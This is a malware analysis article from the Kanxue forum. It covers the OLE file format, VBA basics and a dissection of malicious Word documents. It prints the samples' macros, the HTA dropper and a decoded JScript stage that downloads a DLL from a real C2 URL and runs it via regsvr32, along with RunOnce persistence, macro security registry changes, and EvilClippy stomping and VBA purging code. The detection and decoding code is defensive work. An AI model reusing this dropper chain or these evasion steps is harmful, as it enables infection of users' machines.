This article is a featured post from the Kanxue (看雪) forum.
I
Office file formats
Office 2007 and later use the OpenXML format (docx, docm, dotx, xlsx, xlsm, xltx, potx). The older binary documents (doc, xls, ppt), and the vbaProject.bin that an OpenXML package embeds, use the OLE compound file (CFB) format, whose 512-byte header is:
struct OLEGUID {
    unsigned int   dw1;
    unsigned short w1;
    unsigned short w2;
    unsigned char  aby[8];
};

struct FileHeader {
    unsigned char  sig[8];          // * signature: D0 CF 11 E0 A1 B1 1A E1
    OLEGUID        oleguid;         // CLSID, normally all zero
    unsigned short VerMinor;        // minor version
    unsigned short VerDll;          // major version: 3 = 512-byte sectors, 4 = 4096-byte sectors
    unsigned short ByteOrder;       // * bytes FE FF: little-endian, FF FE: big-endian (only little-endian occurs in practice)
    unsigned short SectorShift;     // * sector size = 2^SectorShift (9 or 12)
    unsigned short MiniSecShift;    // * mini sector size = 2^MiniSecShift (6, i.e. 64 bytes)
    unsigned short Reserved1;       // reserved
    unsigned int   Reserved2;       // reserved
    unsigned int   NumDirSects;     // * number of directory sectors (0 in version 3 files)
    unsigned int   NumFatSects;     // * number of FAT sectors
    unsigned int   DirSect;         // * SectorID of the first directory sector
    unsigned int   TransactSig;     // transaction signature, 0
    unsigned int   MiniStrMax;      // mini stream cutoff: streams smaller than this live in the mini stream, default 4096
    unsigned int   MiniFatSect;     // * SectorID of the first MiniFAT sector
    unsigned int   NumMiniFatSects; // * number of MiniFAT sectors
    unsigned int   DifatSect;       // * SectorID of the first DIFAT sector
    unsigned int   NumDifatSects;   // * number of DIFAT sectors
    unsigned int   DiFat[109];      // first 109 DIFAT entries: the SectorIDs of the FAT sectors
};
Special SectorID values (as defined in MS-CFB):
    0xFFFFFFFA  MAXREGSECT   largest regular SectorID
    0xFFFFFFFC  DIFSECT      the sector holds DIFAT entries
    0xFFFFFFFD  FATSECT      the sector holds FAT entries
    0xFFFFFFFE  ENDOFCHAIN   end of a sector chain
    0xFFFFFFFF  FREESECT     unused sector
// Office DirectoryEntry structure (128 bytes)
struct Element {
    wchar_t        Name[32];      // entry name, UTF-16LE, NUL-terminated
    unsigned short NameLength;    // length of Name in bytes, including the terminating NUL
    unsigned char  Type;          // 0: unused/invalid; 1: storage (directory); 2: stream; 5: root storage
    unsigned char  Flags;         // node colour in the red-black tree (0 red, 1 black)
    unsigned int   sidLeft;       // left sibling EntryID (0xFFFFFFFF = NOSTREAM)
    unsigned int   sidRight;      // right sibling EntryID
    unsigned int   sidChild;      // child EntryID (storages only)
    OLEGUID        ClsID;
    unsigned int   UserFlags;     // usually 0
    __int64        CreateTime;    // creation time as a Windows FILETIME (100 ns ticks since 1601-01-01), not a Unix timestamp
    __int64        ModifyTime;    // modification time, same format
    unsigned int   StartSect;     // SectorID of the stream's first sector (for the root entry: first sector of the mini stream)
    unsigned int   SizeLow;       // stream size in bytes (low 32 bits)
    unsigned int   SizeHigh;      // high 32 bits, 0 in version 3 files
};
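The two structures above are enough to read a compound file by hand. The parser below is an added example (not code from the post): it validates the header, builds the FAT from the DIFAT entries, walks the directory chain and reads a stream by following its FAT chain, refusing a chain that loops or points outside the file (a classic way for a crafted document to stall a parser). Mini streams (streams smaller than MiniStrMax, which live inside the root entry's mini stream) are deliberately not implemented. The sample file is constructed in build_sample() so the script runs offline.

```python
"""Minimal OLE compound-file (CFB) parser for the header, FAT, directory and streams."""
import struct

SIGNATURE = b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1"
MAXREGSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFA, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF                     # "no sibling / no child" in directory entries
HEADER_FMT = "<8s16s5H6s9I"               # 76 bytes; DiFat[109] follows at offset 76
ENTRY_FMT = "<64sHBBIII16sIQQIQ"          # 128-byte directory entry, SizeLow+SizeHigh read as one Q


class CompoundFile:
    def __init__(self, data: bytes):
        if data[:8] != SIGNATURE:
            raise ValueError("not an OLE compound file")
        (_, self.clsid, _, self.major, byte_order, sec_shift, _, _,
         _, n_fat, first_dir, _, self.mini_cutoff, _, _, first_difat, n_difat,
         ) = struct.unpack_from(HEADER_FMT, data, 0)
        if byte_order != 0xFFFE or sec_shift not in (9, 12):
            raise ValueError("unsupported byte order or sector size")
        self.data, self.sec_size = data, 1 << sec_shift
        per_sector = self.sec_size // 4
        # DIFAT = 109 header entries + a chain of DIFAT sectors (last dword of each links onward)
        difat = [s for s in struct.unpack_from("<109I", data, 76) if s != FREESECT]
        sect, hops = first_difat, 0
        while sect != ENDOFCHAIN and hops < n_difat:
            ids = struct.unpack("<%dI" % per_sector, self.sector(sect))
            difat.extend(s for s in ids[:-1] if s != FREESECT)
            sect, hops = ids[-1], hops + 1
        self.fat = []
        for s in difat[:n_fat]:
            self.fat.extend(struct.unpack("<%dI" % per_sector, self.sector(s)))
        raw = self.read_chain(first_dir)
        entries = (self._entry(raw[i:i + 128]) for i in range(0, len(raw), 128))
        self.entries = [e for e in entries if e["type"] != 0]   # type 0 = unused slot

    def sector(self, n: int) -> bytes:
        off = (n + 1) * self.sec_size         # sector 0 starts right after the header sector
        if n > MAXREGSECT or off + self.sec_size > len(self.data):
            raise ValueError("sector %#x lies outside the file" % n)
        return self.data[off:off + self.sec_size]

    def read_chain(self, start: int) -> bytes:
        """Concatenate the sectors of a FAT chain; a crafted FAT that loops is rejected."""
        out, seen, s = [], set(), start
        while s != ENDOFCHAIN:
            if s > MAXREGSECT or s >= len(self.fat) or s in seen:
                raise ValueError("broken FAT chain at sector %#x" % s)
            seen.add(s)
            out.append(self.sector(s))
            s = self.fat[s]
        return b"".join(out)

    def _entry(self, raw: bytes) -> dict:
        (name, name_len, typ, _, left, right, child, _, _, _, _, start, size) = struct.unpack(ENTRY_FMT, raw)
        if self.major == 3:
            size &= 0xFFFFFFFF                # SizeHigh carries no meaning in version 3 files
        return {"name": name[:max(name_len - 2, 0)].decode("utf-16-le"), "type": typ,
                "left": left, "right": right, "child": child, "start": start, "size": size}

    def read_stream(self, name: str) -> bytes:
        e = next(e for e in self.entries if e["type"] == 2 and e["name"] == name)
        if e["size"] < self.mini_cutoff:
            raise NotImplementedError("mini stream: follow the MiniFAT inside the root entry's stream")
        return self.read_chain(e["start"])[:e["size"]]


def build_sample() -> bytes:
    """Constructed file: sector 0 = FAT, sector 1 = directory, sectors 2..9 = a 4096-byte 'WordDocument' stream."""
    fat = [FATSECT, ENDOFCHAIN] + list(range(3, 10)) + [ENDOFCHAIN]
    fat += [FREESECT] * (128 - len(fat))

    def entry(name, typ, child, start, size):
        n = name.encode("utf-16-le") + b"\0\0"
        return struct.pack(ENTRY_FMT, n.ljust(64, b"\0"), len(n), typ, 1, NOSTREAM, NOSTREAM,
                           child, b"\0" * 16, 0, 0, 0, start, size)

    directory = (entry("Root Entry", 5, 1, ENDOFCHAIN, 0)
                 + entry("WordDocument", 2, NOSTREAM, 2, 4096)).ljust(512, b"\0")
    header = struct.pack(HEADER_FMT, SIGNATURE, b"\0" * 16, 0x3E, 3, 0xFFFE, 9, 6, b"\0" * 6,
                         0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    header += struct.pack("<109I", 0, *[FREESECT] * 108)          # DIFAT[0] = FAT sector 0
    payload = (b"Hello from the WordDocument stream. " * 128)[:4096]
    return header + struct.pack("<128I", *fat) + directory + payload


if __name__ == "__main__":
    cf = CompoundFile(build_sample())
    for e in cf.entries:
        print("%-14s type=%d start=%#x size=%d" % (e["name"], e["type"], e["start"], e["size"]))
    print(cf.read_stream("WordDocument")[:36])
```

Run it against a real .doc or an extracted word/vbaProject.bin by passing the file's bytes to CompoundFile; the streams under the VBA storage are what olevba decompresses.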
The new format is really a standard ZIP archive: an Open XML document can be opened like any other ZIP file, and it contains XML files, RELS files and a few other parts.
Document structure:
│  [Content_Types].xml      // content type of every part, used by the application to parse the package
│
├─docProps
│      app.xml              // application-level properties: page count, line count, application version, ...
│      core.xml             // user-entered properties: title, subject, author, ...
│
├─word
│  │  document.xml          // body of the Word document
│  │  fontTable.xml         // font table (the fonts used in the document)
│  │  settings.xml          // document settings
│  │  styles.xml            // styles
│  │  vbaData.xml           // VBA-related data, e.g. whether an auto-open event is bound and whether the project is encrypted
│  │  vbaProject.bin        // the VBA project itself: an OLE compound file embedded in the ZIP
│  │  webSettings.xml
│  │
│  ├─theme
│  │      theme1.xml        // theme: colour scheme, font sizes, ...
│  │
│  └─_rels
│          document.xml.rels    // relationships between the document parts
│          vbaProject.bin.rels  // relationship from the VBA project to vbaData.xml
│
└─_rels
       .rels                // top-level relationships between the package parts
Install oletools:
    pip install -U oletools
3.1 Tools for analysing the OLE document structure
olebrowse: a small GUI for browsing the storages and streams of a document;
olemeta: dump the document's metadata, such as author and modification date;
II
A quick look at VBA
Module: the area where code is written.
Function: can be called from anywhere in the program; the code goes between the Function and End Function keywords.
Sub procedure: has no return value; the code goes between the Sub and End Sub keywords.
Comment: a line beginning with a single quote (') or with "REM" is a comment.
VBA variables and constants:
Basic naming rules: the first character of a variable name must be a letter; the characters space ! @ & $ # cannot be used in a name; a name is at most 255 characters long; VB reserved keywords cannot be used as variable names.
Variable declaration:   Dim <<variable_name>> As <<variable_type>>
Constant declaration:   Const <<constant_name>> As <<constant_type>> = <<constant_value>>
Numeric data types:
Non-numeric data types:
VBA operators:
Arithmetic: + - * / \ Mod ^ (add, subtract, multiply, divide, integer divide, remainder, exponent). VBA has no % operator; the remainder operator is Mod.
Comparison: as in other languages; <> means "not equal".
Logical: And, Or, Not, Xor.
Concatenation: + and &. With two numeric variables A=5, B=10, A+B is 15 but A&B is "510"; with two strings both operators concatenate.

Control flow:

    ' If / ElseIf / Else
    If expression1 Then
        Statement1
    ElseIf expression2 Then
        Statement2
    Else
        Statement3
    End If

    ' switch
    Select Case expression
        Case expressionlist1
            statement1
            statement2
        Case expressionlist2
            statement1
            statement2
        Case expressionlistn
            statement1
        Case Else
            elsestatement1
            elsestatement2
    End Select

    ' for loop; Exit For leaves the loop early
    For counter = start To end [Step stepcount]
        statement1
        statement2
        Exit For
    Next

    ' for each loop
    For Each item In Group
        statement1
    Next

    ' while loop
    While condition
        statements1
    Wend

    ' do-while loop; Exit Do leaves the loop early
    Do
        statements1
    Loop While condition
VBA strings:
VBA arrays:

    Dim arr(5)    ' 6 elements, indices 0 to 5 (the lower bound is 0 unless Option Base 1 is set)

Handlers can be written for many events; SelectionChange, for example, fires when the selection changes. Two ways of writing to a file, first through the Scripting runtime's FileSystemObject:

    Const ForWriting = 2      ' the Scripting constant is not defined when the object is created late-bound
    Dim text1 As String
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set stream = fso.OpenTextFile("F:\worksp\vba\Support.log", ForWriting, True)
    text1 = "text1"
    stream.WriteLine text1
    stream.Close

and then with the built-in Open statement:

    Dim FilePath As String
    FilePath = "F:\workplace\test.txt"
    Open FilePath For Output As #2
    Dim text1 As String
    text1 = "test1"
    Write #2, text1
    text1 = "text2"
    Write #2, text1
    Close #2
    MsgBox ("Write text")
III
Malicious document analysis in practice
The final goals are therefore: 1. work out what the document actually does; 2. find the C2 server.
Extract the VBA: olevba.exe -c .\report.06.21.doc > vba.txt
olevba 0.60 on Python 3.9.5 - http://decalage.info/python/oletools
===============================================================================
FILE: .\report.06.21.doc
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO procedureSize.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/procedureSize'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Function globView(countPoint)
Debug.Print Shell("" + indexClassInit("explorer "))
End Function
Function indexClassInit(countPoint, Optional procIteratorCaption = "c:\progra", Optional nextBooleanConv = "ta")
indexClassInit = countPoint & procIteratorCaption & "mdata\linkSelectTmp.h" & nextBooleanConv
End Function
Function collectClassH(arr As Variant)
Dim out As String
out = ""
For cnt = 1 To UBound(arr)
out = out & Chr(arr(cnt) Xor 100)
Next
collectClassH = out
End Function
-------------------------------------------------------------------------------
VBA MACRO rightCaptReference.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/rightCaptReference'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub autoopen()
functionVInteger
queryWin = globView("")
End Sub
-------------------------------------------------------------------------------
VBA MACRO classRem.bas
in file: word/vbaProject.bin - OLE stream: 'VBA/classRem'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Sub functionVInteger()
Open indexClassInit("") For Output As #1
Print #1, collectClassH(collectException)
Close #1
End Sub
Function collectException()
collectException = Split(ActiveDocument.Range.Text, "x")
End Function
Analysis of the VBA:
autoopen (rightCaptReference): runs when the document is opened; it calls functionVInteger and then globView.
collectException: Split(ActiveDocument.Range.Text, "x") turns the document body into an array, so the payload is stored in the visible text as decimal numbers separated by "x".
collectClassH: XORs every number with 100 and appends the resulting character; the loop starts at index 1, so whatever precedes the first "x" (the decoy text) is skipped.
indexClassInit: concatenates its arguments into the path c:\programdata\linkSelectTmp.hta (with the "explorer " prefix it becomes the command line "explorer c:\programdata\linkSelectTmp.hta").
functionVInteger: decodes the document text and writes the result to c:\programdata\linkSelectTmp.hta.
globView: Shell("explorer c:\programdata\linkSelectTmp.hta") opens the dropped HTA through Explorer instead of launching mshta.exe directly from Word.
The dropped linkSelectTmp.hta (the document text after XOR decoding):

<html><body><div id='vbMemoryCaption'>fX17KWUoaGN0YWN9O2Vzb2xjLmVsZ25pU3lyYXJiaWw7KTIgLCJncGoucG1UdGNlbGVTa25pbFxcY2lsYnVwXFxzcmVzdVxcOmMiKGVsaWZvdGV2YXMuZWxnbmlTeXJhcmJpbDspeWRvYmVzbm9wc2VyLldrbmlMdGFkKGV0aXJ3LmVsZ25pU3lyYXJiaWw7MSA9IGVweXQuZWxnbmlTeXJhcmJpbDtuZXBvLmVsZ25pU3lyYXJiaWw7KSJtYWVydHMuYmRvZGEiKHRjZWpiT1hldml0Y0Egd2VuID0gZWxnbmlTeXJhcmJpbCByYXZ7eXJ0eykwMDIgPT0gc3V0YXRzLldrbmlMdGFkKGZpOykoZG5lcy5Xa25pTHRhZDspZXNsYWYgLCJnOFlVRjBqQ1l1NDJCRT0mWTBBWHgwTllQMk9XVWhzTGlvWVAxd2EzRGxqPWRpYyZjODU3NWl1VU1mVFp4PWVnYXAmYUNrYlZtVjdCd0RZdHV2VmxjM0J0MWtiRFQ9ZWdhcCZjRTlKUmZtSmhINVRtd1p2dktlbUNVc0k3Mj1lZ2FwJkYwQm9QOWN0MlVxeWxxNHlobnBTUlVmcURHPWhjcmFlcyZSWmptNVdYU3d3c0hQWmRTODc5PThjRFJZMUJmaSY1Z3Q0V3hhVU89cmVzdSZmN3FnaGUyNnFoUkxKcD05SWhJRj8xMXljb2YvNzA0MjIvbWdkQ29PekZNSkZ5SFFyT05vZ3RkYTQ0RHRnRGM0S0h6ZVVpVExHWC9zSHh2OTRHTi9wem5pbS8wNzcyNy9hRFQ4Lzk4NDU4L2FkZGEvbW9jLmRzYmJvaHlkYWVybGEvLzpwdHRoIiAsIlRFRyIobmVwby5Xa25pTHRhZDspInB0dGhsbXguMmxteHNtIih0Y2VqYk9YZXZpdGNBIHdlbiA9IFdrbmlMdGFkIHJhdg==aGV5OykiZ3BqLnBtVHRjZWxlU2tuaWxcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzcnZzZ2VyIihudXIuYlZlcnVkZWNvclBjbnVmOykidGNlamJvbWV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZWpiT1hldml0Y0Egd2VuID0gY2lyZW5lR3JlZHJvQmVtYW4gcmF2OykibGxlaHMudHBpcmNzdyIodGNlamJPWGV2aXRjQSB3ZW4gPSBiVmVydWRlY29yUGNudWYgcmF2aGV5msscriptcontrol.scriptcontrol</div><div id='funcSize'>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/</div>
<script language='javascript'>
function lengthD(memoryText){return(new ActiveXObject(memoryText));}
function intLTpl(memoryTable){return(documentTextboxListbox.getElementById(memoryTable).innerHTML);}
function linkVal(){return(intLTpl('funcSize'));}
function buttProcLibrary(s){var e={}; var i; var b=0; var c; var x; var l=0; var a; var windowVariantQuery=''; var w=String.fromCharCode; var L=s.length;var constC = borderMain('tArahc');for(i=0;i<64;i++){e[linkVal()[constC](i)]=i;}for(x=0;x<L;x++){c=e[s[constC](x)];b=(b<<6)+c;l+=6;while(l>=8){((a=(b>>>(l-=8))&0xff)||(x<(L-2)))&&(windowVariantQuery+=w(a));}}return(windowVariantQuery);};
function borderMain(mainCount){return mainCount.split('').reverse().join('');}
sizeIntLibrary = window;
documentTextboxListbox = document;
sizeIntLibrary.resizeTo(1, 1);
sizeIntLibrary.moveTo(-100, -100);
var rightHCur = documentTextboxListbox.getElementById('vbMemoryCaption').innerHTML.split("aGV5");
var bytesLZero = borderMain(buttProcLibrary(rightHCur[0]));
var arrMemory = borderMain(buttProcLibrary(rightHCur[1]));
var pointerInteger = rightHCur[2];
</script>
<script language='vbscript'>
Function viewDelVar(vbMemoryCaption)
Set screenTrustConst = CreateObject(pointerInteger)
With screenTrustConst
.language = "jscript"
.timeout = 360000
End With
screenTrustConst.eval(vbMemoryCaption)
End Function
</script>
<script language='vbscript'>Call viewDelVar(bytesLZero)</script>
<script language='vbscript'>Call viewDelVar(arrMemory)</script>
<script language='javascript'>sizeIntLibrary['close']();</script>
</body></html>

The div vbMemoryCaption holds three parts separated by the marker aGV5: two base64 blobs and the ProgID msscriptcontrol.scriptcontrol. The JScript decodes each blob with its own base64 routine (buttProcLibrary, using the alphabet stored in the funcSize div; constC is "charAt" reversed), reverses the result with borderMain, and the VBScript viewDelVar evaluates each stage through a ScriptControl object whose language is set to jscript. The window is shrunk to 1x1 and moved off-screen first, so nothing is visible. Decoded and reversed, the two stages are:

var datLinkW = new ActiveXObject("msxml2.xmlhttp");
datLinkW.open("GET", "http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g", false);
datLinkW.send();
if (datLinkW.status == 200) {
  try {
    var librarySingle = new ActiveXObject("adodb.stream");
    librarySingle.open;
    librarySingle.type = 1;
    librarySingle.write(datLinkW.responsebody);
    librarySingle.savetofile("c:\\users\\public\\linkSelectTmp.jpg", 2);
    librarySingle.close;
  } catch(e) {}
}
var funcProcedureVb = new ActiveXObject("wscript.shell");
var nameBorderGeneric = new ActiveXObject("scripting.filesystemobject");
funcProcedureVb.run("regsvr32 c:\\users\\public\\linkSelectTmp.jpg");
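Both decoding layers of this chain are mechanical, so they are worth scripting rather than redoing by hand for the next sample. The block below is an added example (not the sample's own code): xor_decode_document_text reproduces collectException and collectClassH (split the document body on "x", XOR each number with 100, skip element 0), and decode_hta_stages reproduces the HTA's JScript (split the vbMemoryCaption text on "aGV5", base64-decode and reverse each part, treat the last part as the ProgID). The document text and HTA it runs on are constructed here from two short stand-in stages so the script runs offline; real extracted text is fed in the same way.

```python
"""Decode the document-text XOR layer and the HTA base64/reverse layer."""
import base64
import re


def xor_decode_document_text(doc_text: str, key: int = 100) -> str:
    """collectException + collectClassH: Split(text, "x"), then Chr(n Xor 100) for each element."""
    parts = doc_text.split("x")
    # For cnt = 1 To UBound(arr) starts at index 1: whatever precedes the first "x"
    # (the decoy text the victim sees) is skipped. Whitespace is tolerated defensively.
    return "".join(chr(int(p.strip()) ^ key) for p in parts[1:] if p.strip())


def decode_hta_stages(hta_html: str, marker: str = "aGV5"):
    """Return ([stage1, stage2, ...], progid) from the HTA's vbMemoryCaption div."""
    m = re.search(r"<div id='vbMemoryCaption'>(.*?)</div>", hta_html, re.S)
    if not m:
        raise ValueError("vbMemoryCaption div not found")
    *blobs, progid = m.group(1).split(marker)
    stages = []
    for blob in blobs:
        blob = blob.strip()
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))   # tolerate missing padding
        stages.append(raw.decode("latin-1")[::-1])              # borderMain(): reverse the string
    return stages, progid


# --- constructed sample (stand-ins for the real stages) ----------------------
def _encode_stage(script: str) -> str:
    """Inverse of the HTA's decoder: reverse, then base64 (how the blobs were produced)."""
    return base64.b64encode(script[::-1].encode("latin-1")).decode()


STAGE1 = 'var datLinkW = new ActiveXObject("msxml2.xmlhttp");'
STAGE2 = 'new ActiveXObject("wscript.shell").run("regsvr32 c:\\\\users\\\\public\\\\linkSelectTmp.jpg");'
SAMPLE_HTA = ("<html><body><div id='vbMemoryCaption'>" + _encode_stage(STAGE1) + "aGV5"
              + _encode_stage(STAGE2) + "aGV5msscriptcontrol.scriptcontrol</div></body></html>")
# What ActiveDocument.Range.Text would hold: decoy text, then "x<n>" for every HTA character.
SAMPLE_DOC_TEXT = "Quarterly report " + "".join("x%d" % (ord(ch) ^ 100) for ch in SAMPLE_HTA)


def decode_chain(doc_text: str):
    """Document text -> HTA -> (JScript stages, ProgID)."""
    hta = xor_decode_document_text(doc_text)
    stages, progid = decode_hta_stages(hta)
    return hta, stages, progid


if __name__ == "__main__":
    hta, stages, progid = decode_chain(SAMPLE_DOC_TEXT)
    print("ProgID:", progid)
    for i, s in enumerate(stages, 1):
        print("stage %d: %s" % (i, s))
```

For the real sample, pass the text from ActiveDocument.Range.Text (or the string olevba prints from the document body) to decode_chain; the custom JScript decoder is standard base64 over the standard alphabet, which is why base64.b64decode reproduces it.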
C2 URL:
http://alreadyhobbsd.com/adda/85489/8TDa/72770/minzp/NG49vxHs/XGLTiUezHK4cDgtD44adtgoNOrQHyFJMFzOoCdgm/22407/focy11?FIhI9=pJLRhq62ehgq7f&user=OUaxW4tg5&ifB1YRDc8=978SdZPHswwSXW5mjZR&search=GDqfURSpnhy4qlyqU2tc9PoB0F&page=27IsUCmeKvvZwmT5HhJmfRJ9Ec&page=TDbk1tB3clVvutYDwB7VmVbkCa&page=xZTfMUui5758c&cid=jlD3aw1PYoiLshUWO2PYN0xXA0Y&=EB24uYCj0FUY8g
The script sends a GET request to this URL and writes the response body to c:\users\public\linkSelectTmp.jpg through ADODB.Stream.
3. linkSelectTmp.hta then runs "regsvr32 c:\users\public\linkSelectTmp.jpg": the "image" is really a DLL, and regsvr32 loads it and calls its DllRegisterServer export.
Extracting the VBA of the second sample with oledump shows many comment statements and obfuscated variable names; a good sample to step through with dynamic debugging. It launches wscript.exe on a file with an .ini extension, forcing the VBScript engine with //e:VBScript (//b suppresses error dialogs):

    Set oShell = CreateObject("Shell.Application")
    CallByName oShell, "ShellExecute", VbMethod, "wscript.exe", "C:\Users\abel\Downloads\deer.ini //e:VBScript //b", "", "", 0

It persists by writing the same command line under RunOnce:

    "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer", "wscript.exeC:\Users\abel\Downloads\deer.ini //e:VBScript //b", "REG_SZ"

Registry writes to Word's macro security settings:

    HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM = 1
    HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings

AccessVBOM = 1 grants scripts programmatic access to the VBA project object model; VBAWarnings is the macro security level (the value written is not shown). It checks connectivity with a WMI ping instead of ping.exe:

    "SELECT * FROM Win32_PingStatus WHERE Address=" + "'coagula.online'"

Debug.Print can be used to print the URL it builds: http://83.166.240.31/get.php?independent=
Unfortunately this URL is already offline, so the analysis cannot be taken further.
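The behaviours seen across the two samples (a script host forced to run a non-script extension with //e:, RunOnce persistence, Word's macro security values being changed, regsvr32 loading an "image", an Office process spawning a script host) are all visible in endpoint telemetry. The block below is an added example, not part of the post: simple detection logic run over constructed Sysmon-style events. The event shape and field names are an assumption made here, and the parent-process values in the sample events are likewise assumed; the command lines and registry paths come from the analysis above.

```python
"""Detection rules for the dropper behaviours above, run over constructed events."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = SCRIPT_HOSTS | {"regsvr32.exe", "mshta.exe", "explorer.exe", "cmd.exe", "powershell.exe"}
SCRIPT_EXTS = {"vbs", "vbe", "js", "jse", "wsf", "wsh"}
ENGINE_SWITCH = re.compile(r"//e:(vbscript|jscript)", re.I)
SCRIPT_ARG = re.compile(r"\s(\S+\.(\w+))\s+//e:", re.I)   # unquoted path before //e: (paths without spaces)
MACRO_SECURITY = re.compile(
    r"\\Software\\Microsoft\\Office\\\d+\.\d+\\\w+\\Security\\(AccessVBOM|VBAWarnings)$", re.I)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
REGSVR32_NONDLL = re.compile(r"\.(jpg|jpeg|png|gif|txt|dat|ini)\b", re.I)


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def check_event(ev: dict) -> list:
    """Return the detections that fire on one event (empty list if none)."""
    hits = []
    if ev["type"] == "process_create":
        image, parent, cmd = _basename(ev["image"]), _basename(ev["parent_image"]), ev["command_line"]
        if parent in OFFICE_APPS and image in LOLBINS:
            hits.append("office process %s spawned %s" % (parent, image))
        if image in SCRIPT_HOSTS and ENGINE_SWITCH.search(cmd):
            m = SCRIPT_ARG.search(cmd)
            if m and m.group(2).lower() not in SCRIPT_EXTS:
                hits.append("script engine forced with //e: on non-script file %s" % m.group(1))
        if image == "regsvr32.exe" and REGSVR32_NONDLL.search(cmd):
            hits.append("regsvr32 registering a file with a non-DLL extension")
    elif ev["type"] == "registry_set":
        target = ev["target"]
        if MACRO_SECURITY.search(target):
            hits.append("Office macro security value changed: %s = %s" % (target.rsplit("\\", 1)[-1], ev["details"]))
        if RUN_KEY.search(target):
            hits.append("Run/RunOnce persistence: %s" % ev["details"])
    return hits


# Constructed events (assumed field names); command lines and keys taken from the analysis above.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r"wscript.exe C:\Users\abel\Downloads\deer.ini //e:VBScript //b"},
    {"type": "registry_set", "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\deer",
     "details": r"wscript.exe C:\Users\abel\Downloads\deer.ini //e:VBScript //b"},
    {"type": "registry_set", "target": r"HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Security\AccessVBOM",
     "details": "1"},
    {"type": "process_create", "image": r"C:\Windows\System32\regsvr32.exe",
     "parent_image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"regsvr32 c:\users\public\linkSelectTmp.jpg"},
    {"type": "process_create", "image": r"C:\Windows\System32\wscript.exe",   # benign control: no hit
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"wscript.exe C:\Scripts\backup.vbs"},
]


def run_detections(events=SAMPLE_EVENTS) -> list:
    """(event index, detection text) for every rule that fires."""
    return [(i, hit) for i, ev in enumerate(events) for hit in check_event(ev)]


if __name__ == "__main__":
    for i, hit in run_detections():
        print("event %d: %s" % (i, hit))
```

The //e: rule deliberately keys on the file extension rather than the content: wscript.exe decides the engine from the extension unless //e: overrides it, so a forced engine on an .ini, .txt or .jpg is itself the signal.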
IV
Common hiding and anti-analysis techniques of Office malware
1. VBA stomping. Create a harmless fakeMessage.vba:

    Sub autoopen()
    MsgBox "fakeMessage"
    End Sub

then replace the stored source of the chosen modules with it, leaving the compiled p-code (which is what actually runs) untouched:

    EvilClippy.exe -n abcdefg -n ThisDocument -s fakevba.vba doc.doc

The p-code can be decompiled back into source with the pcode2code library (built on pcodedmp):
Summary:
VBA stomping mainly targets automated scanners: tools that only decompress the stored source see the fake code, which lowers the chance of AV detection. It does not hinder manual analysis, because the p-code is still in the file and can be dumped.
The C# below shows the complementary technique, VBA purging: the p-code is removed and only the compressed source is kept, so Office has to recompile the module when the document is opened.

    // Get the CompressedSourceCode from module stream
    streamBytes = commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).GetData();
    string OG_VBACode = Utils.GetVBATextFromModuleStream(streamBytes, vbaModule.textOffset);
    // Remove P-code from module stream and set the module to only have the CompressedSourceCode
    streamBytes = Utils.RemovePcodeInModuleStream(streamBytes, vbaModule.textOffset, OG_VBACode);
    commonStorage.GetStorage("VBA").GetStream(vbaModule.moduleName).SetData(streamBytes);

The module's text offset in the dir stream is then set to 0 (the compressed source now starts at the beginning of the module stream), the PerformanceCache in _VBA_PROJECT is replaced by a bare header, and the __SRP_* streams are deleted:

    // Change offset to 0 so that document can find compressed source code.
    commonStorage.GetStorage("VBA").GetStream("dir").SetData(Utils.Compress(Utils.ChangeOffset(dirStream)));
    Console.WriteLine("\n[*] Module offset changed to 0.");

    // Remove performance cache in _VBA_PROJECT stream. Replace the entire stream with _VBA_PROJECT header.
    byte[] data = Utils.HexToByte("CC-61-FF-FF-00-00-00");
    commonStorage.GetStorage("VBA").GetStream("_VBA_PROJECT").SetData(data);
    Console.WriteLine("\n[*] PerformanceCache removed from _VBA_PROJECT stream.");

